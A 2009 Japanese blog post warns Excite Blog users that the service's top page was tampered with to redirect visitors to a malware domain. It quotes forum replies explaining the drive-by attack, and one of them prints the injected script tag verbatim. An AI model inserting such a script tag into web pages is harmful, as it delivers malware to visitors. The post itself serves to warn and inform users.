人気ブログランキング | 話題のタグを見る
2009年 01月 04日                    
090104 エキサイトユーザーへの緊急事項
エキサイト本体へ改竄が行われている模様です!
※ 現在は修正されております


慌てず騒がず、以下をきっちりお読み下さい。



 
 1月4日。さぁてブログを書こうかとログインすると、常駐のウィルス感知ソフト・avast!さんが警告音・・・!
とりあえず削除をしたものの、記事投稿を開くと警告音
過去記事の編集を開いても警告音
ログインした状態からTOPページ ( エキサイトトップ ) を開いても警告音・・・。
 そして、表示されているのは
 HTML : Script-inf
マルウェアのタイプ: ウイルス/ワーム
s1.cawjb。com  ( 決して見にいかないように! )
と、常に同じもの。

ユーザー掲示板を見に行ったところ、私だけではない模様。
という事は、『 あろぐ 』 へのサイト改鋳ではなく、エキサイト本体に・・・?

午後、改めて掲示板を見てみると、このような書き込みがありました。
そのままコピペしておきます。
先月末から、普通のサイトが悪意ある第3者によって改竄され、
閲覧しただけでウィルス置き場へ強制アクセスさせる
罠スクリプトを埋め込まれるという被害が爆発的に増加しています。

FlashplayerおよびWindowsなどに脆弱性を持ったままのPCであれば、
罠がしこまれたページを開いただけでネットゲームのアカウトハック、
あるいはPCに感染し新たな攻撃への踏み台と化してしまう
トロイの木馬に感染してしまいます。

s1.cawjb.comはそれら被害サイトに仕込まれる罠が
転送する在中国の危険ドメインのひとつです。
エキブロトップページのHTMLソースを確認したところ、
上記危険アドレスへ転送する罠がしかけられていることを確認しました。

ウィルス対策ソフトの反応は誤検出などではなく
実際にウィルスが検出されているものと思われます。

ログイン時等に反応しているのであれば、
エキサイト本体の深層部まで改竄を受けている可能性が
極めて高いです。
運営側の早急な修正、周知等の対応を望みます。

(01/04 12:51追記)
問題のスクリプトを定期的に観測されていた方の
報告によると、問題の罠は先月19日以降削除され、
無効化されているとのことです。
ですので、現時点まででの感染の可能性は低いと
思われますが、
ドメイン自体は生きていますので、いつ再び有害化するかわかりません。

エキサイト運営の早急な対処をお願いしたいところです。

 ( 類似スレッドにて・同じ方の書き込み )
 
投稿・写真アップロードプログラムもおそらく改竄を受け、
ウィルスをダウンロードする仕組みに変えられて
いる可能性があります。
avastが反応しているということは、
それが水際で食い止められているということです。

現状は自PCの感染の確認を第一に考え、エキサイト側のシステム修正があるまでは
ログイン・記事投稿等は控えられたほうがよろしいかと思われます。


( さらに追記がありました )

アンチウィルスが感知しているのは「危険なサイトに
密やかに転送しようとするスクリプトの振る舞い」
のようです。

問題のドメインを監視して下さっていた方によると、
現在リダイレクトされる罠スクリプト自体は
先月19日には更新を停止、削除されていたとのことですので、
昨日~現時点では仮に接続されていたとしても
感染の可能性は極めて低いと思われます。

ただ、罠の「置き場」である大元のドメイン自体は
まだ生きているようですので、
いつまた罠が置かれるかわかりません。

そういった観点からみると、
今後罠が置かれたと想定した場合、

>ということはウィルスソフトでs1.cawjb.comへの接続を遮断できている
>ユーザはウィルスには感染していないということなんでしょうか?

これに関してはその通りだと思います。
危険なサイトのプログラムにアクセスする前に、
転送を遮断してくれているわけですから。

>ウィルスソフトの機能を停止させて観覧するのは良くなさそうですね

現状、いわゆる「普通のサイト」が第3者によって
改竄され、罠をしかけられるケースが急増しています。
(最近ではJR北海道のHPが改竄を受けています)
エキサイトブログに限らず、web閲覧の際に
ウィルス対策ソフト無しでブラウジングされるのは、
正直お薦めできません。

今回の件に関しては、エキサイト運営側の動きも見据えて、
不要なアクセスは一時控えられるのが得策かもしれません。


avast!さんが効いている&現在は感染の可能性は低いということですが、
エキサイトユーザーさんはちょっと用心したほうがいいかも知れません・・・。


この改竄のせいか、avast!さんで引っかかるせいか、ブログの表示やリンクを押した際の反応も遅いような・・・気がしないでもない。
ウィルス感知系を入れてる方はいちいち警告が出て鬱陶しいでしょうが、誤作動ではないようですので、切らないようにしましょうねー。

 早くエキサイト側で修正・スクリプト削除をしてくれる事をお願いいたします!!

これがRMT絡みかどうかは知りませんが、同じTagsをつけて置きます。
いやだわもう・・・正月早々、こんな記事・・・




21時 : 追記です。
 あまりにも警告がうるさくて心臓に悪いので、avast!さんでPCをウィルスチェックしました。
その後、19時半頃にはまだ警告が鳴る状態でしたが、20時45分過ぎ、試してみたところ、鳴りませんでした。
  ログイン時、( 確認しました )
  記事投稿・記事修正、ログイン状態からのエキサイトTOPへのリンクの際の警告が
  鳴らなくなってました。
エキサイトさんが対策をしたのだと・・・信じたい・・・。
avast!さんが 「 うぜぇー 」 とか言われて拗ねてるんじゃないんだと・・・信じたい・・・。




さらに追記です。
エキサイト掲示板より引用致します。
幾つかある同様のスレッドを読んでみると、皆さん avast! を使っている方みたいで私のセキュリティ・ソフト(ウィルスセキュリティZERO)では無反応でした。 そのくせ関係ないものを誤検知したりしますが・・・

トップページのソースを調べてみたら、『お知らせ』にある
ブログパーツ機能を追加しました
ドガログサービス終了のお知らせ
「友達の最新記事」の更新再開のお知らせ
―という文章の後ろにそれぞれ
<script src="http://s1.cawjb.com/jp。js"></script> ―というスクリプトが挿入されていました。

クリックしても特に問題は無く普通に『エキサイトブログ向上委員会』のページが開くので、夕飯の後でエキサイトに報告しようかな・・・とのんびり構えていたのですが、今調べたら問題のスクリプトは消えていました。
正月休みでエキサイトもまだお休みかと思っていたのですが、ひょっとしたら連絡を受けて対処してくれたのかもしれません。

一応そのソースは保管しておくことにしますが、こうした緊急を要することが起きた場合はエキサイトブログに直接報告する方がよろしいかと思います。 掲示板をエキサイトのスタッフがいつも読んでいるとは思えませんので・・・
『お問い合わせフォーム』→ △ttp://regist.excite.co.jp/help/support
というわけで、恐らくエキサイトさんが危険な罠への誘導スクリプトを削除してくれた模様です。
ご安心を。

( 2度とこういう事がないように、お願いしまーっす! )
by aroam | 2009-01-04 13:37
<< 怪人への四十三歩 コンプリート! ページトップ 怪人への・・・天気待ち >>
トップ
Blog since 2005,6,11
初めてご来訪の方は
【 コチラ 】 をお読み下さい
当ブログは
コメント・TB承認制です
表示は管理者確認後。
ご了承下さい

Profile

etc.

最新の記事
マイブーム
at 2014-11-30 00:23
粉ミルクとホットケーキ
at 2014-09-30 15:30
乳幼児のコップ飲み
at 2014-09-26 22:18
離乳食作りの必需品
at 2014-09-25 11:48
トイレ・トレ対策「案」
at 2014-09-24 12:11
以前の記事


☆参加しています★
クリックで救える命がある。

by aroam
S M T W T F S
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
タグ
検索
ライフログ
その他のジャンル
記事ランキング

当ブログへのリンクは
フリーです。
更新ほぼ停止中ですがね。
Copyright (C) 2002-2011 SQUARE ENIX CO., LTD. All Rights Reserved.
当ホームページに記載されている会社名・製品名・システム名などは、各社の登録商標、もしくは商標です。

XML | ATOM

会社概要
プライバシーポリシー
利用規約
個人情報保護
情報取得について
免責事項
ヘルプ